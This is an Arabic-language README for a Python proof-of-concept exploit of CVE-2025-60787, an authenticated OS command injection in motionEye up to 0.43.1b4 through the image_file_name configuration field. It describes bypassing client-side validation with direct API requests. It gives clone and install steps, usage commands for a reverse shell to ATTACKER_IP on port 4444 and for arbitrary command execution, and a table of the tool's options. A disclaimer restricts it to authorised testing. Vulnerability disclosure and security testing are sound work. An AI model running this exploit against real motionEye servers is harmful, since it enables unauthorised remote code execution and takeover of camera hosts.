
PoC بلغة بايثون لـ CVE-2025-60787، ثغرة حقن أوامر نظام تشغيل موثّقة تؤدي إلى تنفيذ تعليمات برمجية عن بُعد في motionEye <= 0.43.1b4 عبر إعداد image_file_name غير المعقّم.
تنفيذ أوامر عن بعد موثوق في motionEye <= 0.43.1b4 عبر معامل تكوين motion غير مُعقّم
المؤلف: d3vn0mi
| الحقل | التفاصيل |
|---|---|
| معرف CVE | CVE-2025-60787 |
| درجة CVSS | 7.2 (عالي) |
| النوع | حقن أوامر نظام التشغيل (CWE-78) |
| المتأثر | motionEye <= 0.43.1b4 |
| تم الإصلاح في | 0.43.1b5 |
يقبل motionEye سلاسل عشوائية في حقول التكوين مثل image_file_name ويكتبها مباشرة في ملفات تكوين Motion (/etc/motioneye/camera-*.conf). عند إعادة تشغيل خدمة Motion، فإنها تفسر هذه الحقول كسلاسل قابلة للتوسع في الصدفة، مما يسمح لمهاجم موثوق بحقن وتنفيذ أوامر نظام تشغيل عشوائية.
تتضمن الواجهة الرسومية للمستخدم التحقق من صحة الجهة العميلة لهذه الحقول، ولكن يمكن تجاوز ذلك بسهولة عن طريق إرسال طلبات API مخصصة مباشرة.
image_file_name ضارةcapture_mode: interval-snapshots)requestsgit clone https://github.com/d3vn0mi/CVE-2025-60787-POC.git
cd CVE-2025-60787-POC
pip install -r requirements.txt
يدعم الاستغلال وضعين: shell عكسي و تنفيذ أوامر.
ابدأ مستمعًا على جهازك، ثم قم بتشغيل:
python3 exploit.py revshell \
--url http://TARGET:8765 \
--user admin \
--password SECRET \
-i ATTACKER_IP \
--port 4444
python3 exploit.py command \
--url http://TARGET:8765 \
--user admin \
--password SECRET \
-e "id; whoami"
تُوفَّر هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذا البرنامج. احصل دائمًا على الإذن المناسب قبل الاختبار.
هذا المشروع مرخص بموجب رخصة MIT.
| العلامة | الوصف |
|---|
--url | رابط motionEye الهدف بما في ذلك المنفذ |
--user | اسم مستخدم motionEye |
--password | كلمة مرور motionEye |
-i / --host | IP المستمع (وضع shell العكسي) |
--port | منفذ المستمع (وضع shell العكسي) |
-e / --exec | الأمر المراد تنفيذه (وضع الأوامر) |
--camera-id | استهداف معرّف كاميرا محدد |
--sh | استخدام /bin/sh بدلاً من /bin/bash |
--no-verify | تخطي التحقق من شهادة TLS |
--proxy | توجيه الحركة عبر وكيل (مثال: http://127.0.0.1:8080) |